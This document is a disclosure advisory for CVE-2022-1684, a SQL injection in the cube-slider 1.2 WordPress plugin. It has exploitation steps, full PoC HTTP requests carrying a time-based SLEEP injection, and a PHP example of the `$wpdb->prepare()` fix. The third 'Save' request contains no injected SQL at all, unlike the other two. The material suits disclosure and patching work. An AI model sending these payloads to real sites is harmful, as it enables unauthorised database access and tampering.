cube-slider 1.2 WordPress plugin SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | May 09 2022 |
| Affected Software | cube-slider |
| Affected Software Type | WordPress plugin |
| Version | 1.2 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-1684 |
| CVSS 3.x Base Score | 2.7 |
| CVSS 2.0 Base Score | 4.0 |
| Reporter | Daniel Krohmer, Shi Chen |
| Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
| Link to Affected Software | https://wordpress.org/plugins/cube-slider |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1684 |
Vulnerability Description
The `idslider` data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the `edit`, `delete` or `save` functionalities of the plugin to craft a malicious POST request.
Exploitation Guide
Exploit 1: Edit
1. Log in as `admin` user. This attack requires at least `admin` privileges.
2. Go to Settings and select Cube Slider in the sub menu.
3. Add a new cube slider by clicking on New Cube Slider.
4. Scroll down and use the Click to edit slider x details button.
5. Clicking the previous button triggers the vulnerable request. `idslider` is the vulnerable data parameter.

A PoC request is given under Exploit Payload 1 (Edit) below.

In the code, the vulnerability is triggered by unsanitized user input of `idslider` at line 207 in `./init.php`.
Exploit 2: Delete
1. Log in as `admin` user. This attack requires at least `admin` privileges.
2. Go to Settings and select Cube Slider in the sub menu.
3. Delete an arbitrary, existing slider by clicking on Click to delete slider x.
4. Clicking the previous button triggers the vulnerable request. `idslider` is the vulnerable data parameter. (Note: the numeric ID value can be set arbitrarily.)

A PoC request is given under Exploit Payload 2 (Delete) below.

In the code, the vulnerability is triggered by unsanitized user input of `idslider` at line 210 in `./init.php`.
Exploit 3: Save
1. Log in as `admin` user. This attack requires at least `admin` privileges.
2. Go to Settings and select Cube Slider in the sub menu.
3. Add a new cube slider by clicking on New Cube Slider.
4. Scroll down and use the Save changes button. No further data input is needed before clicking this button.
5. Clicking the previous button triggers the vulnerable request. `idslider` is the vulnerable data parameter.

A PoC request is given under Exploit Payload 3 (Save) below.

In the code, the vulnerability is triggered by unsanitized user input of `idslider` at line 199 in `./init.php`. Notice that there is no sanitization at all in the whole query!
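All three code sections share the same root cause: the raw `idslider` value is interpolated into SQL. The following is an added illustration written for this advisory, not the cube-slider plugin's code. It contrasts the unsafe string-building pattern the advisory describes with the WordPress `$wpdb->prepare()` fix. The table name `wp_cube_slider`, the handler names and the `FakeWpdb` stand-in (which mimics only the `%d` behaviour of `$wpdb->prepare()`, so the file runs outside WordPress) are assumptions.

```php
<?php
// Added illustration for the advisory above; not the cube-slider plugin's code.
// Assumptions: the table name wp_cube_slider, the handler names, and the
// FakeWpdb stand-in below, which mimics only the part of WordPress's $wpdb
// that the hardened handler needs (prepare() with %d casts via intval()).

class FakeWpdb
{
    public $prefix = 'wp_';
    public $last_query = '';

    // WordPress substitutes each %d with intval() of the matching argument.
    public function prepare($query, ...$args)
    {
        $i = 0;
        return preg_replace_callback('/%d/', function () use ($args, &$i) {
            return (string) intval($args[$i++]);
        }, $query);
    }

    // Records the SQL it would have sent to MySQL instead of executing it.
    public function query($sql)
    {
        $this->last_query = $sql;
        return true;
    }
}

// Unsafe pattern (assumed shape of the flaw, not the plugin's literal lines):
// the raw POST value is concatenated into the statement, so anything after
// the leading digit becomes part of the SQL.
function delete_slider_unsafe(FakeWpdb $wpdb, array $post)
{
    $id = $post['idslider'];
    $wpdb->query("DELETE FROM {$wpdb->prefix}cube_slider WHERE idslider = " . $id);
    return $wpdb->last_query;
}

// Hardened pattern: accept only a string of decimal digits, then bind the
// value through prepare() with a %d placeholder. Inside WordPress the handler
// would additionally call check_admin_referer() and current_user_can() first.
function delete_slider_hardened(FakeWpdb $wpdb, array $post)
{
    if (!isset($post['idslider']) || !ctype_digit((string) $post['idslider'])) {
        return null; // reject before any SQL is built
    }
    $wpdb->query($wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}cube_slider WHERE idslider = %d",
        (int) $post['idslider']
    ));
    return $wpdb->last_query;
}

// Constructed inputs: the first is the advisory's payload value, URL-decoded;
// the second is what a legitimate click on the delete button sends.
$injected = ['idslider' => '4 AND (SELECT 3477 FROM (SELECT(SLEEP(5)))DhVP)'];
$benign   = ['idslider' => '6'];

$wpdb = new FakeWpdb();
printf("unsafe, injected  : %s\n", delete_slider_unsafe($wpdb, $injected));
printf("hardened, injected: %s\n", var_export(delete_slider_hardened($wpdb, $injected), true));
printf("hardened, benign  : %s\n", delete_slider_hardened($wpdb, $benign));
```

Run it with the `php` CLI. The unsafe handler emits the whole injected expression as part of the `WHERE` clause, which is exactly the time-based condition the payloads below use; the hardened handler returns `null` for the injected value and builds `... WHERE idslider = 6` for the benign one. Casting with `%d` alone would also defuse this particular payload, since `intval()` stops at the first non-digit, but rejecting malformed input before it reaches the query is the better default because it fails loudly on tampering instead of silently acting on a truncated value. The same change applies to the `edit` and `save` paths the advisory reports at lines 207 and 199 of `./init.php`.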
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.
Exploit Payload 1: Edit
```http
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details
```
Exploit Payload 2: Delete
```http
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4
```
Exploit Payload 3: Save
```http
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes
```